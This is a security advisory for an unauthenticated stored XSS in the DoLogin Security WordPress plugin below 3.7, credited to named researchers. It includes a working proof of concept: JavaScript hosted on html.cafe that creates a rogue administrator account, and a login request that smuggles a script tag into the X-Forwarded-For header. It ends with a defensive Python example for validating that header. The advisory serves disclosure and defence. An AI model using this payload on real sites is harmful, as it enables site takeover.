DoLogin Security < 3.7 - Unauthenticated Stored Cross-Site Scripting

Description

The plugin stores the value of the X-Forwarded-For header as the client IP address without validating or sanitizing it, so an unauthenticated attacker can inject a Stored XSS payload through WordPress' login form.

Proof of Concept

1. Host the following JavaScript payload on html.cafe.

const url = 'https://s…t/wp-admin/user-new.php';

fetch(url)
  .then(response => response.text())
  .then(html => {
    const parser = new DOMParser();
    const doc = parser.parseFromString(html, 'text/html');
    const nonceValue = doc.getElementById('_wpnonce_create-user').value;
    const requestOptions = {
      method: 'POST',
      headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
      },
      body: `action=createuser&_wpnonce_create-user=${encodeURIComponent(
        nonceValue
      )}&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=administrator&email=a@a.com&first_name=&last_name=&url=&pass1=O%21k6c5%5EfjO%5E1sF%26%24%21%26V2PG9e&pass2=O%21k6c5%5EfjO%5E1sF%26%24%21%26V2PG9e&send_user_notification=0&role=administrator&ure_other_roles=&createuser=Add+New+User`
    };

    return fetch(url, requestOptions);
  });

2. Send a login request with a specially crafted X-Forwarded-For header that references the hosted payload.

POST /wp-login.php HTTP/2
Host: <host>
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Content-Length: 106
Cache-Control: max-age=0
Sec-Ch-Ua: 
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: https://<host>
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://<host>/wp-login.php
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
X-Forwarded-For: <script src=https://html.cafe/x...3></script>

log=XSSor&pwd=abcd&wp-submit=Log+In&redirect_to=https%3A%2F%2F<host>%2Fwp-admin%2F&testcookie=1
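The root cause is that the header value is stored as an IP address without ever being checked to be one. The following added example (not code from the plugin or the advisory) shows the defensive handling in Python: the X-Forwarded-For chain is only honoured when the TCP peer is a trusted proxy, and every hop must parse as a real IP literal; the script payload from the request above is rejected and the peer address is used instead. The trusted-proxy ranges are an assumption; in the plugin's own PHP the same checks would be filter_var($ip, FILTER_VALIDATE_IP) on input and esc_html() on output.

```python
import ipaddress
from typing import Optional, Union

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]

# Constructed sample: reverse proxies that are allowed to set X-Forwarded-For
# (assumption; a real deployment lists its own load balancers here).
TRUSTED_PROXIES = (
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("192.168.1.5/32"),
)


def parse_ip(value: str) -> Optional[IPAddr]:
    """Return an address object for a strictly valid IPv4/IPv6 literal, else None."""
    try:
        return ipaddress.ip_address(value.strip())
    except ValueError:
        # Anything that is not an IP literal (e.g. '<script src=...>') ends here.
        return None


def is_trusted_proxy(ip: IPAddr) -> bool:
    return any(ip in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr: str, x_forwarded_for: Optional[str]) -> str:
    """Pick the address to record for a login attempt.

    X-Forwarded-For is client-controlled text. It is only consulted when the
    direct peer is a known proxy, and only hops that parse as IP literals are
    accepted; a malformed hop means the header was tampered with, so the
    function falls back to REMOTE_ADDR. The stored value is therefore always
    a canonical IP string and can never carry markup into a later page render.
    """
    peer = parse_ip(remote_addr)
    if peer is None:
        raise ValueError("REMOTE_ADDR must be a valid IP literal")
    if x_forwarded_for is None or not is_trusted_proxy(peer):
        return str(peer)
    # Walk from the right: the hop appended by our own proxy is the most reliable.
    for hop in reversed(x_forwarded_for.split(",")):
        ip = parse_ip(hop)
        if ip is None:
            return str(peer)
        if not is_trusted_proxy(ip):
            return str(ip)
    return str(peer)
```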

Fixed in 3.7

Classification

Type
XSS

Miscellaneous

Original Researcher
Bartlomiej Marek and Tomasz Swiadek
Submitter
Bartlomiej Marek
Verified
Yes

Timeline

Publicly Published
2023-08-28
Added
2023-08-30
Last Updated
2023-08-30